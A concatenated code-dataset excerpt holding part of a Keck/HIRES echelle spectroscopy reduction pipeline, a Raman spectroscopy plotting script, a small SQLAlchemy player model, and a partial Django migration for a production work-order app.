name_pattern = '^HI\\.\\d{8}\\.\\d{5}\\.fits$'\n\n # scan the raw files\n fname_lst = sorted(os.listdir(path))\n\n # prepare logtable\n logtable = Table(dtype=[\n ('frameid', 'i2'), ('fileid', 'S17'), ('imgtype', 'S3'),\n ('object', 'S20'), ('i2cell', 'bool'), ('exptime', 'f4'),\n ('obsdate', Time),\n ('deckname', 'S2'), ('filter1', 'S5'), ('filter2', 'S5'),\n ('nsat_1', 'i4'), ('nsat_2', 'i4'), ('nsat_3', 'i4'),\n ('q95_1', 'i4'), ('q95_2', 'i4'), ('q95_3', 'i4'),\n ])\n\n # prepare infomation to print\n pinfo = FormattedInfo(all_columns,\n ['frameid', 'fileid', 'imgtype', 'object', 'i2cell', 'exptime',\n 'obsdate', 'deckname', 'nsat_2', 'q95_2'])\n\n # print header of logtable\n print(pinfo.get_separator())\n print(pinfo.get_title())\n print(pinfo.get_separator())\n\n # start scanning the raw files\n prev_frameid = -1\n for fname in fname_lst:\n if not re.match(name_pattern, fname):\n continue\n fileid = fname[0:17]\n filename = os.path.join(path, fname)\n hdu_lst = fits.open(filename)\n # parse images\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n\n head0 = hdu_lst[0].header\n\n frameid = prev_frameid + 1\n\n # get obsdate in 'YYYY-MM-DDTHH:MM:SS' format\n date = head0.get('DATE-OBS')\n utc = head0.get('UTC', head0.get('UT'))\n obsdate = Time('%sT%s'%(date, utc))\n\n exptime = head0.get('ELAPTIME')\n i2in = head0.get('IODIN', False)\n i2out = head0.get('IODOUT', True)\n i2cell = i2in\n imagetyp = head0.get('IMAGETYP')\n targname = head0.get('TARGNAME', '')\n lampname = head0.get('LAMPNAME', '')\n\n if imagetyp == 'object':\n # science frame\n imgtype = 'sci'\n objectname = targname\n elif imagetyp == 'flatlamp':\n # flat\n imgtype = 'cal'\n objectname = '{} ({})'.format(imagetyp, lampname)\n elif imagetyp == 'arclamp':\n # arc lamp\n imgtype = 'cal'\n objectname = '{} ({})'.format(imagetyp, lampname)\n elif imagetyp == 'bias':\n imgtype = 'cal'\n objectname = 'bias'\n else:\n print('Unknown IMAGETYP:', imagetyp)\n\n # get deck and filter information\n deckname = head0.get('DECKNAME', '')\n filter1 = head0.get('FIL1NAME', '')\n filter2 = head0.get('FIL2NAME', '')\n\n # determine the numbers of saturated pixels for 3 CCDs\n mask_sat1 = (mask_lst[0] & 4)>0\n mask_sat2 = (mask_lst[1] & 4)>0\n mask_sat3 = (mask_lst[2] & 4)>0\n nsat_1 = mask_sat1.sum()\n nsat_2 = mask_sat2.sum()\n nsat_3 = mask_sat3.sum()\n\n # find the 95% quantile\n q95_lst = [np.sort(data.flatten())[int(data.size*0.95)]\n for data in data_lst]\n q95_1, q95_2, q95_3 = q95_lst\n\n # close the fits file\n hdu_lst.close()\n\n item = [frameid, fileid, imgtype, objectname, i2cell, exptime, obsdate,\n deckname, filter1, filter2,\n nsat_1, nsat_2, nsat_3, q95_1, q95_2, q95_3]\n\n logtable.add_row(item)\n # get table Row object. (not elegant!)\n item = logtable[-1]\n\n # print log item with colors\n string = pinfo.get_format(has_esc=False).format(item)\n print(print_wrapper(string, item))\n\n prev_frameid = frameid\n\n print(pinfo.get_separator())\n\n # sort by obsdate\n #logtable.sort('obsdate')\n\n # determine filename of logtable.\n # use the obsdate of the LAST frame.\n obsdate = logtable[-1]['obsdate'].iso[0:10]\n outname = '{}.obslog'.format(obsdate)\n if os.path.exists(outname):\n i = 0\n while(True):\n i += 1\n outname = '{}.{}.obslog'.format(obsdate, i)\n if not os.path.exists(outname):\n outfilename = outname\n break\n else:\n outfilename = outname\n\n # save the logtable\n\n # loginfo is not pinfo because not all columns need to be printed in the\n # screen, but all columns should be written in logfile.\n loginfo = FormattedInfo(all_columns)\n outfile = open(outfilename, 'w')\n outfile.write(loginfo.get_title()+os.linesep)\n outfile.write(loginfo.get_dtype()+os.linesep)\n outfile.write(loginfo.get_separator()+os.linesep)\n for row in logtable:\n outfile.write(loginfo.get_format(has_esc=False).format(row)+os.linesep)\n outfile.close()\n\ndef get_badpixel_mask(binning, ccd=0):\n \"\"\"Get bad pixel mask for HIRES CCDs.\n\n Args:\n binning (tuple): CCD binning (*bin_x*, *bin_y*).\n ccd (int): CCD number.\n\n Returns:\n mask (:class:`numpy.ndarray`): Mask Image.\n\n \"\"\"\n # for only 1 CCD\n if ccd == 0:\n if binning == (1, 1):\n # all Flase\n mask = np.zeros((2048, 2048), dtype=np.bool)\n mask[:, 1127] = True\n mask[:375, 1128] = True\n mask[:, 2007] = True\n mask[:, 2008] = True\n # for 3 CCDs\n elif ccd == 1:\n # for Blue CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[3878:, 4] = True\n mask[3008:, 219] = True\n mask[4005:, 337] = True\n mask[1466:, 411] = True\n mask[1466:, 412] = True\n mask[3486:, 969] = True\n mask[:, 994:] = True\n elif ccd == 2:\n # for Green CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[3726:, 323] = True\n mask[3726:, 324] = True\n elif ccd == 3:\n # for Red CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[1489:2196, 449] = True\n mask[:, 0:45] = True\n return np.int16(mask)\n\nclass TraceFigure(TraceFigureCommon):\n \"\"\"Figure to plot the order tracing.\n \"\"\"\n def __init__(self):\n TraceFigureCommon.__init__(self, figsize=(20,10), dpi=150)\n self.ax1 = self.add_axes([0.05,0.07,0.50,0.86])\n self.ax2 = self.add_axes([0.59,0.55,0.36,0.34])\n self.ax3 = self.add_axes([0.59,0.13,0.36,0.34])\n self.ax4 = self.ax3.twinx()\n\ndef mosaic_3_images(data_lst, mask_lst):\n \"\"\"Mosaic three images.\n\n Args:\n data_lst (list): List of image data.\n mask_lst (list): List of mask data.\n\n Returns:\n tuple:\n \"\"\"\n data1, data2, data3 = data_lst\n mask1, mask2, mask3 = mask_lst\n gap_rg, gap_gb = 26, 20\n\n # mosaic image: allimage and allmask\n h3, w3 = data3.shape\n h2, w2 = data2.shape\n h1, w1 = data1.shape\n\n hh = h3 + gap_rg + h2 + gap_gb + h1\n allimage = np.ones((hh, w3), dtype=data1.dtype)\n allmask = np.zeros((hh, w3), dtype=np.int16)\n r1, g1, b1 = 0, h3+gap_rg, h3+gap_rg+h2+gap_gb\n r2, g2, b2 = r1+h3, g1+h2, b1+h1\n allimage[r1:r2] = data3\n allimage[g1:g2] = data2\n allimage[b1:b2] = data1\n allmask[r1:r2] = mask3\n allmask[g1:g2] = mask2\n allmask[b1:b2] = mask1\n # fill gap with gap pixels\n allmask[r2:g1] = 1\n allmask[g2:b1] = 1\n\n return allimage, allmask\n\ndef reduce():\n \"\"\"2D to 1D pipeline for Keck/HIRES.\n \"\"\"\n\n # find obs log\n logname_lst = [fname for fname in os.listdir(os.curdir)\n if fname[-7:]=='.obslog']\n if len(logname_lst)==0:\n print('No observation log found')\n exit()\n elif len(logname_lst)>1:\n print('Multiple observation log found:')\n for logname in sorted(logname_lst):\n print(' '+logname)\n else:\n pass\n\n # read obs log\n logtable = read_obslog(logname_lst[0])\n\n # load config files\n config = configparser.ConfigParser(\n inline_comment_prefixes = (';','#'),\n interpolation = configparser.ExtendedInterpolation(),\n )\n # find local config file\n for fname in os.listdir(os.curdir):\n if fname[-4:]=='.cfg':\n config.read(fname)\n print('Load Congfile File: {}'.format(fname))\n break\n\n # extract keywords from config file\n section = config['data']\n rawpath = section.get('rawpath')\n statime_key = section.get('statime_key')\n exptime_key = section.get('exptime_key')\n section = config['reduce']\n midpath = section.get('midpath')\n odspath = section.get('odspath')\n figpath = section.get('figpath')\n mode = section.get('mode')\n fig_format = section.get('fig_format')\n oned_suffix = section.get('oned_suffix')\n\n # create folders if not exist\n if not os.path.exists(figpath): os.mkdir(figpath)\n if not os.path.exists(odspath): os.mkdir(odspath)\n if not os.path.exists(midpath): os.mkdir(midpath)\n\n nccd = 3\n\n ########################## load file selection #############################\n sel_lst = {}\n filesel_filename = 'file_selection.txt'\n if os.path.exists(filesel_filename):\n sel_file = open(filesel_filename)\n for row in sel_file:\n row = row.strip()\n if len(row)==0 or row[0] in '#':\n continue\n g = row.split(':')\n key, value = g[0].strip(), g[1].strip()\n if len(value)>0:\n sel_lst[key] = value\n sel_file.close()\n\n ################################ parse bias ################################\n bias_file = config['reduce.bias'].get('bias_file')\n\n if mode=='debug' and os.path.exists(bias_file):\n has_bias = True\n # load bias data from existing file\n hdu_lst = fits.open(bias_file)\n # pack bias image\n bias = [hdu_lst[iccd+1].data for iccd in range(nccd)]\n hdu_lst.close()\n message = 'Load bias data from file: {}'.format(bias_file)\n logger.info(message)\n print(message)\n else:\n # read each individual CCD\n bias_data_lst = [[] for iccd in range(nccd)]\n\n # initialize printing infomation\n pinfo1 = FormattedInfo(all_columns, ['frameid', 'fileid', 'object',\n 'exptime', 'nsat_1', 'q95_1', 'nsat_2', 'q95_2',\n 'nsat_3', 'q95_3'])\n\n for logitem in logtable:\n if logitem['object'].strip().lower()=='bias':\n fname = logitem['fileid']+'.fits'\n filename = os.path.join(rawpath, fname)\n hdu_lst = fits.open(filename)\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n hdu_lst.close()\n\n # print info\n if len(bias_data_lst[0]) == 0:\n print('* Combine Bias Images: {}'.format(bias_file))\n print(' '*2 + pinfo1.get_separator())\n print(' '*2 + pinfo1.get_title())\n print(' '*2 + pinfo1.get_separator())\n string = pinfo1.get_format().format(logitem)\n print(' '*2 + print_wrapper(string, logitem))\n\n for iccd in range(nccd):\n bias_data_lst[iccd].append(data_lst[iccd])\n\n n_bias = len(bias_data_lst[0]) # get number of bias images\n has_bias = n_bias > 0\n\n if has_bias:\n # there is bias frames\n print(' '*2 + pinfo1.get_separator())\n\n bias = []\n # the final HDU list\n bias_hdu_lst = fits.HDUList([fits.PrimaryHDU()])\n\n # scan for each ccd\n for iccd in range(nccd):\n ### 3 CCDs loop begins here ###\n bias_data_lst[iccd] = np.array(bias_data_lst[iccd])\n\n section = config['reduce.bias']\n sub_bias = combine_images(bias_data_lst[iccd],\n mode = 'mean',\n upper_clip = section.getfloat('cosmic_clip'),\n maxiter = section.getint('maxiter'),\n mask = (None, 'max')[n_bias>=3],\n )\n\n message = '\\033[{2}mCombined bias for CCD {0}: Mean = {1:6.2f}\\033[0m'.format(\n iccd+1, sub_bias.mean(), (34, 32, 31)[iccd])\n\n print(message)\n\n head = fits.Header()\n head['HIERARCH GAMSE BIAS NFILE'] = n_bias\n\n ############## bias smooth ##################\n section = config['reduce.bias']\n if section.getboolean('smooth'):\n # bias needs to be smoothed\n smooth_method = section.get('smooth_method')\n\n h, w = sub_bias.shape\n if smooth_method in ['gauss', 'gaussian']:\n # perform 2D gaussian smoothing\n smooth_sigma = section.getint('smooth_sigma')\n smooth_mode = section.get('smooth_mode')\n \n bias_smooth = gaussian_filter(sub_bias,\n sigma=smooth_sigma, mode=smooth_mode)\n\n # write information to FITS header\n head['HIERARCH GAMSE BIAS SMOOTH'] = True\n head['HIERARCH GAMSE BIAS SMOOTH METHOD'] = 'GAUSSIAN'\n head['HIERARCH GAMSE BIAS SMOOTH SIGMA'] = smooth_sigma\n head['HIERARCH GAMSE BIAS SMOOTH MODE'] = smooth_mode\n else:\n print('Unknown smooth method: ', smooth_method)\n pass\n\n sub_bias = bias_smooth\n else:\n # bias not smoothed\n head['HIERARCH GAMSE BIAS SMOOTH'] = False\n\n bias.append(sub_bias)\n bias_hdu_lst.append(fits.ImageHDU(data=sub_bias, header=head))\n ### 3 CCDs loop ends here ##\n\n # write bias into file\n bias_hdu_lst.writeto(bias_file, overwrite=True)\n\n else:\n # no bias found\n pass\n\n ########################## find flat groups #########################\n flat_file = config['reduce.flat'].get('flat_file')\n\n flatdata_lst = []\n # a list of 3 combined flat images. [Image1, Image2, Image3]\n # bias has been corrected already. but not rotated yet.\n flatmask_lst = []\n # a list of 3 flat masks\n\n if mode=='debug' and os.path.exists(flat_file):\n # read flat data from existing file\n hdu_lst = fits.open(flat_file)\n for iccd in range(nccd):\n flatdata_lst.append(hdu_lst[iccd*2+1].data)\n flatmask_lst.append(hdu_lst[iccd*2+2].data)\n flatdata = hdu_lst[nccd*2+1].data.T\n flatmask = hdu_lst[nccd*2+2].data.T\n hdu_lst.close()\n message = 'Loaded flat data from file: {}'.format(flat_file)\n print(message)\n\n # alias of flat data and mask\n flatdata1 = flatdata_lst[0].T\n flatmask1 = flatmask_lst[0].T\n flatdata2 = flatdata_lst[1].T\n flatmask2 = flatmask_lst[1].T\n flatdata3 = flatdata_lst[2].T\n flatmask3 = flatmask_lst[2].T\n\n else:\n print('*'*10 + 'Parsing Flat Fieldings' + '*'*10)\n # print the flat list\n pinfo_flat = FormattedInfo(all_columns, ['frameid', 'fileid', 'object',\n 'exptime', 'nsat_1', 'q95_1', 'nsat_2', 'q95_2', 'nsat_3', 'q95_3'])\n print(' '*2 + pinfo_flat.get_separator())\n print(' '*2 + pinfo_flat.get_title())\n print(' '*2 + pinfo_flat.get_separator())\n for logitem in logtable:\n if len(logitem['object'])>=8 and logitem['object'][0:8]=='flatlamp':\n string = pinfo_flat.get_format().format(logitem)\n print(' '*2 + print_wrapper(string, logitem))\n print(' '*2 + pinfo_flat.get_separator())\n\n\n flat_group_lst = {}\n for iccd in range(nccd):\n\n key = 'flat CCD%d'%(iccd+1)\n sel_string = sel_lst[key] if key in sel_lst else ''\n prompt = '\\033[{1}mSelect flats for CCD {0} [{2}]: \\033[0m'.format(\n iccd+1, (34, 32, 31)[iccd], sel_string)\n\n # read selected files from terminal\n while(True):\n input_string = input(prompt)\n if len(input_string.strip())==0:\n # nothing input\n if key in sel_lst:\n # nothing input but already in selection list\n flat_group_lst[iccd] = parse_num_seq(sel_lst[key])\n break\n else:\n # repeat prompt\n continue\n else:\n # something input\n frameid_lst = parse_num_seq(input_string)\n # pack\n flat_group_lst[iccd] = frameid_lst\n # put input string into selection list\n sel_lst[key] = input_string.strip()\n break\n\n # now combine flat images\n\n flat_hdu_lst = [fits.PrimaryHDU()]\n # flat_hdu_lst is the final HDU list to be saved as fits\n\n for iccd in range(nccd):\n frameid_lst = flat_group_lst[iccd]\n\n # now combine flats for this CCD\n flat_data_lst = []\n # flat_data_lst is a list of flat images to be combined.\n # flat_data_lst = [Image1, Image2, Image3, Image4, ... ...]\n\n #scan the logtable\n # log loop inside the CCD loop because flats for different CCDs are\n # in different files\n for logitem in logtable:\n if logitem['frameid'] in frameid_lst:\n filename = os.path.join(rawpath, logitem['fileid']+'.fits')\n hdu_lst = fits.open(filename)\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n hdu_lst.close()\n\n # correct bias and pack into flat_data_lst\n if has_bias:\n flat_data_lst.append(data_lst[iccd]-bias[iccd])\n else:\n flat_data_lst.append(data_lst[iccd])\n\n # initialize flat mask\n if len(flat_data_lst) == 1:\n flatmask = mask_lst[iccd]\n flatmask = flatmask | mask_lst[iccd]\n\n n_flat = len(flat_data_lst)\n\n if n_flat == 0:\n continue\n elif n_flat == 1:\n flatdata = flat_data_lst[0]\n else:\n flat_data_lst = np.array(flat_data_lst)\n flatdata = combine_images(flat_data_lst,\n mode = 'mean',\n upper_clip = 10,\n maxiter = 5,\n mask = (None, 'max')[n_flat>=3],\n )\n #print('\\033[{1}mCombined flat data for CCD {0}: \\033[0m'.format(\n # iccd+1, (34, 32, 31)[iccd]))\n flatdata_lst.append(flatdata)\n flatmask_lst.append(flatmask)\n\n # pack the combined flat data into flat_hdu_lst\n head = fits.Header()\n head['HIERARCH GAMSE FLAT CCD{} NFILE'.format(iccd+1)] = n_flat\n flat_hdu_lst.append(fits.ImageHDU(flatdata, head))\n flat_hdu_lst.append(fits.ImageHDU(flatmask))\n # CCD loop ends here\n\n # alias of flat data and mask\n flatdata1 = flatdata_lst[0].T\n flatmask1 = flatmask_lst[0].T\n flatdata2 = flatdata_lst[1].T\n flatmask2 = flatmask_lst[1].T\n flatdata3 = flatdata_lst[2].T\n flatmask3 = flatmask_lst[2].T\n\n # mosaic flat data\n flatdata, flatmask = mosaic_3_images(\n data_lst = (flatdata1, flatdata2, flatdata3),\n mask_lst = (flatmask1, flatmask2, flatmask3),\n )\n\n flat_hdu_lst.append(fits.ImageHDU(flatdata.T))\n flat_hdu_lst.append(fits.ImageHDU(flatmask.T))\n # write flat data to file\n flat_hdu_lst = fits.HDUList(flat_hdu_lst)\n flat_hdu_lst.writeto(flat_file, overwrite=True)\n print('Flat data writed to {}'.format(flat_file))\n\n ######################### find & trace orders ##########################\n\n # simple debackground for all 3 CCDs\n xnodes = np.arange(0, flatdata1.shape[1], 200)\n flatdbkg1 = simple_debackground(flatdata1, flatmask1, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n xnodes = np.arange(0, flatdata2.shape[1], 200)\n flatdbkg2 = simple_debackground(flatdata2, flatmask2, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n xnodes = np.arange(0, flatdata3.shape[1], 200)\n flatdbkg3 = simple_debackground(flatdata3, flatmask3, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n allimage, allmask = mosaic_3_images(\n data_lst = (flatdbkg1, flatdbkg2, flatdbkg3),\n mask_lst = (flatmask1, flatmask2, flatmask3),\n )\n\n tracefig = TraceFigure()\n\n section = config['reduce.trace']\n aperset = find_apertures(allimage, allmask,\n scan_step = section.getint('scan_step'),\n minimum = section.getfloat('minimum'),\n separation = section.get('separation'),\n align_deg = section.getint('align_deg'),\n filling = section.getfloat('filling'),\n degree = section.getint('degree'),\n display = section.getboolean('display'),\n fig = tracefig,\n )\n # decorate trace fig and save to file\n tracefig.adjust_positions()\n tracefig.suptitle('Trace for all 3 CCDs', fontsize=15)\n figfile = os.path.join(figpath, 'trace.png')\n tracefig.savefig(figfile)\n\n trcfile = os.path.join(midpath, 'trace.trc')\n aperset.save_txt(trcfile)\n\n regfile = os.path.join(midpath, 'trace.reg')\n aperset.save_reg(regfile, transpose=True)\n\n # save mosaiced flat image\n trace_hdu_lst = fits.HDUList(\n [fits.PrimaryHDU(allimage.T),\n fits.ImageHDU(allmask.T),\n ])\n trace_hdu_lst.writeto(config['reduce.trace'].get('file'), overwrite=True)\n\n ######################### Extract flat spectrum ############################\n\n spectra1d = extract_aperset(flatdata, flatmask,\n apertureset = aperset,\n lower_limit = 6,\n upper_limit = 6,\n )\n\n flatmap = get_slit_flat(flatdata, flatmask,\n apertureset = aperset,\n spectra1d = spectra1d,\n lower_limit = 6,\n upper_limit = 6,\n deg = 7,\n q_threshold = 20**2,\n figfile = 'spec_%02d.png',\n )\n fits.writeto('flat_resp.fits', flatmap, overwrite=True)\n","sub_path":"gamse/pipelines/hires.py","file_name":"hires.py","file_ext":"py","file_size_in_byte":32152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"204127239","text":"from v1.apps import db\n\nfrom ..statistics.models import Statistics\n\nclass Player(db.Model):\n __tablename__ = 'player'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(32))\n active = db.Column(db.Boolean, default=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = db.relationship('User', backref=db.backref('players', lazy='dynamic'))\n #statistics = db.relationship(\"Statistics\", uselist=False, backref=\"player_statistics\")\n","sub_path":"server/v1/apps/game/players/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"250887602","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Raman:\n def __init__(self):\n self.fitPixels = True\n self.removeFluo = True\n\n self.oilFiles = [\"data/{}.TXT\".format(oil) for oil in [\"mais\", \"arachide\", \"tournesol\", \"canola\", \"olive40m\"]]\n self.oilNames = [\"Maïs\", \"Arachide\", \"Tournesol\", \"Canola\", \"Olive\"]\n self.integrationTimes = [100, 100, 100, 100, 4500]\n\n self.solFiles = [\"data/{}.TXT\".format(solution) for solution in [\"ethanol\", \"isopropanol\", \"methanol\", \"glycerol\", \"sucrose\"]]\n self.solNames = [\"Éthanol\", \"Isopropanol\", \"Méthanol\", \"Glycérol\", \"Sucrose\"]\n\n self.readNoiseValue = 61634\n self.thermalCoef = 8.97\n self.photonsPerBit = 4.35\n\n self.calibCoefs = []\n self.pixels = []\n self.waveNumbers = []\n self.intensities = []\n\n self.fileName = \"\"\n\n def graphOils(self):\n fig, axes = plt.subplots(len(self.oilFiles), sharex=True, sharey=False)\n\n self.setCalibration()\n\n for i, file in enumerate(self.oilFiles):\n pixel, intensity = self.getData(file)\n intensity -= self.readNoiseValue\n intensity -= self.thermalCoef * self.integrationTimes[i]\n intensity *= self.photonsPerBit\n intensity /= self.integrationTimes[i]\n\n waveNumber = self.translate(pixel)\n\n waveNumber, intensity = self.cut(waveNumber, intensity)\n\n fit = self.curveFit(waveNumber, intensity, degree=5, sections=1)\n\n raman = intensity - fit\n\n axes[i].plot(waveNumber, intensity)\n axes[i].plot(waveNumber, raman, label=self.oilNames[i])\n axes[i].legend(handlelength=0, fontsize=12)\n axes[i].set_ylim(min(raman), 3200)\n axes[i].tick_params(labelsize=12)\n\n print(\"STD \", i, np.std(raman[200:220]))\n\n if i == 2:\n axes[i].set_ylabel(\"Intensité [p/s]\", fontsize=13)\n\n if i == 6: # i == 4 : Last resort ploting\n plt.show()\n\n ax1 = plt.subplot2grid((5, 2), (0, 0), rowspan=3, colspan=2)\n ax2 = plt.subplot2grid((5, 2), (3, 0))\n ax3 = plt.subplot2grid((5, 2), (3, 1))\n ax4 = plt.subplot2grid((5, 2), (4, 0), colspan=2)\n ax1.plot(waveNumber, intensity, label=\"Signal total\")\n ax1.plot(waveNumber, fit, label=\"Curve-fit\")\n ax2.plot(waveNumber, intensity, label=\"Signal total\")\n ax2.plot(waveNumber, fit, label=\"Curve-fit\")\n ax3.plot(waveNumber, intensity, label=\"Signal total\")\n ax3.plot(waveNumber, fit, label=\"Curve-fit\")\n ax4.plot(waveNumber, raman, label=\"Signal Raman\")\n\n ax2.set_ylabel(\"Intensité [p/s]\", fontsize=13)\n ax4.set_xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n ax1.set_xlim(1200, 1850)\n ax2.set_xlim(1200, 1450)\n ax3.set_xlim(1500, 1850)\n ax4.set_xlim(1200, 1850)\n ax1.legend()\n ax3.legend()\n ax4.legend()\n ax1.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n ax2.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n ax3.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n plt.show()\n\n plt.xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n plt.xlim(1200, 1850)\n fig.subplots_adjust(hspace=0, top=0.965, bottom=0.11, left=0.14, right=0.94, wspace=0.2)\n\n plt.show()\n\n def graphSols(self):\n fig, axes = plt.subplots(len(self.solFiles), sharex=True, sharey=False)\n\n self.setCalibration()\n\n for i, file in enumerate(self.solFiles):\n pixel, intensity = self.getData(file)\n intensity -= self.readNoiseValue\n intensity -= self.thermalCoef * 100\n\n waveNumber = self.translate(pixel)\n\n waveNumber, intensity = self.cut(waveNumber, intensity, low=250, high=1600)\n\n fit = 0\n if i == 3 or 4:\n fit = self.curveFit(waveNumber, intensity, degree=2, sections=1)\n\n raman = intensity - fit\n raman /= 100\n raman *= self.photonsPerBit\n axes[i].plot(waveNumber, raman, label=self.solNames[i])\n axes[i].legend(handlelength=0, fontsize=12)\n axes[i].set_ylim(min(raman), 4000)\n axes[i].tick_params(labelsize=12)\n\n if i == 2:\n axes[i].set_ylabel(\"Intensité [p/s]\", fontsize=13)\n\n plt.xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n plt.xlim(250, 1600)\n fig.subplots_adjust(hspace=0, top=0.965, bottom=0.11, left=0.14, right=0.94, wspace=0.2)\n\n plt.show()\n\n def getFile(self):\n self.oilFiles = [\"data/{}.TXT\".format(oil) for oil in [\"mais\", \"arachide\", \"tournesol\", \"canola\", \"olive40m\"]]\n\n self.fileName = \"data/{}\".format([\"mercury_27nov.txt\", \"ethanol.TXT\", \"olive40m.TXT\", \"canola.TXT\", \"mais.TXT\",\n \"arachide.TXT\", \"tournesol.TXT\", \"lampeMercure1.TXT\"][6])\n\n @staticmethod\n def getData(fileName):\n pixels = []\n intensities = []\n with open(fileName, \"r\") as file:\n for line in file.readlines()[:-1]:\n data = line.split(\",\")[1:]\n pixels.append(float(data[0]))\n intensities.append(float(data[1]))\n return np.array(pixels), np.array(intensities)\n\n def setCalibration(self):\n mercure1 = [[588, 842.2, 1089.5, 1104.3], [671, 690, 708, 709]]\n mercure2 = [[587.5, 841, 1089, 1103.5], [671, 690, 708, 709]]\n # ethanol = [[571.2, 670.3, 697, 809.2, 927.2], self.wToLambda([879, 1050, 1085, 1279, 1450])]\n\n pixels = mercure1[0] + mercure2[0]\n wavelengths = mercure1[1] + mercure2[1]\n\n self.calibCoefs = np.polyfit(pixels, wavelengths, 1)\n\n def translate(self, pixels):\n [a, b] = self.calibCoefs\n wavelengths = np.array(pixels)*a + b\n waveNumbers = 1/632.8 - 1/wavelengths\n return waveNumbers * 10**7\n\n @staticmethod\n def wToLambda(waveNumbers):\n return [np.round(((1/632.8 - w*10**(-7))**(-1)), 2) for w in waveNumbers]\n\n def cut(self, waveNumbers, intensities, low=1200, high=1850):\n start = np.where(waveNumbers > low)[0][0]\n end = np.where(waveNumbers > high)[0][0]\n\n return waveNumbers[start: end], intensities[start: end]\n\n @staticmethod\n def curveFit(waveNumbers, intensities, degree, sections):\n fit = []\n for waveNumbers, intensities in zip(np.split(waveNumbers, sections), np.split(intensities, sections)):\n\n coefs = np.polyfit(waveNumbers, intensities, degree)\n fit.extend([np.sum([(waveNumber**i)*c for i, c in enumerate(reversed(coefs))]) for waveNumber in waveNumbers])\n return fit\n\n @staticmethod\n def save(waveNumbers, intensities):\n col1 = np.array(waveNumbers)[np.newaxis].T\n col2 = np.array(intensities)[np.newaxis].T\n data = np.hstack((col1, col2))\n\n np.savetxt(\"outputRaman.txt\", data, '%.15f')\n\n\nRaman().graphOils()\nRaman().graphSols()\n","sub_path":"20181120 - spectroscopieRaman/graphRaman.py","file_name":"graphRaman.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"74820302","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bom',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=31)),\n ('notes', models.CharField(max_length=255, null=True, blank=True)),\n ('active', models.BooleanField(default=True)),\n ('est_time', models.DurationField(null=True, blank=True)),\n ('wholesale', models.DecimalField(null=True, max_digits=6, decimal_places=2, blank=True)),\n ('est_labor', models.DecimalField(null=True, max_digits=6, decimal_places=2, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Employee',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=31)),\n ('last_name', models.CharField(max_length=31)),\n ('initials', models.CharField(unique=True, max_length=3)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Punch',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date_created', models.DateTimeField(auto_now_add=True)),\n ('check_in', models.DateTimeField(auto_now_add=True)),\n ('check_out', models.DateTimeField(null=True, blank=True)),\n ('notes', models.CharField(max_length=255, null=True, blank=True)),\n ('approved', models.BooleanField(default=False)),\n ('paid', models.BooleanField(default=False)),\n ('employee', models.ForeignKey(to='production.Employee')),\n ],\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=31)),\n ],\n ),\n migrations.CreateModel(\n name='WorkOrder',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('closed', models.BooleanField(default=False)),\n ('issue_date', models.DateField(auto_now_add=True)),\n ('close_date', models.DateField(null=True, blank=True)),\n ('close_by', models.ForeignKey(related_name='close_by', blank=True, to='production.Employee', null=True)),\n ('issue_by', models.ForeignKey(related_name='issue_by', to='production.Employee')),\n ],\n ),\n migrations.CreateModel(\n name='WorkOrderBom',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order', models.IntegerField(null=True, blank=True)),\n ('actual', models.IntegerField(null=True, blank=True)),\n ('actual_by', models.ForeignKey(related_name='actual_by', blank=True, to='production.Employee', null=True)),\n ('bom', models.ForeignKey(to='production.Bom')),\n ('order_by', models.ForeignKey(related_name='order_by', to='production.Employee')),\n ('work_order', models.ForeignKey(to='production.WorkOrder')),\n ],\n ),\n migrations.AddField(\n model_name='punch',\n name='task',\n field=models.ForeignKey(to='production.Task'),\n ),\n migrations.AddField(\n model_name='punch',\n name='work_order',\n field=models.ForeignKey(to='production.WorkOrder'),\n ),\n 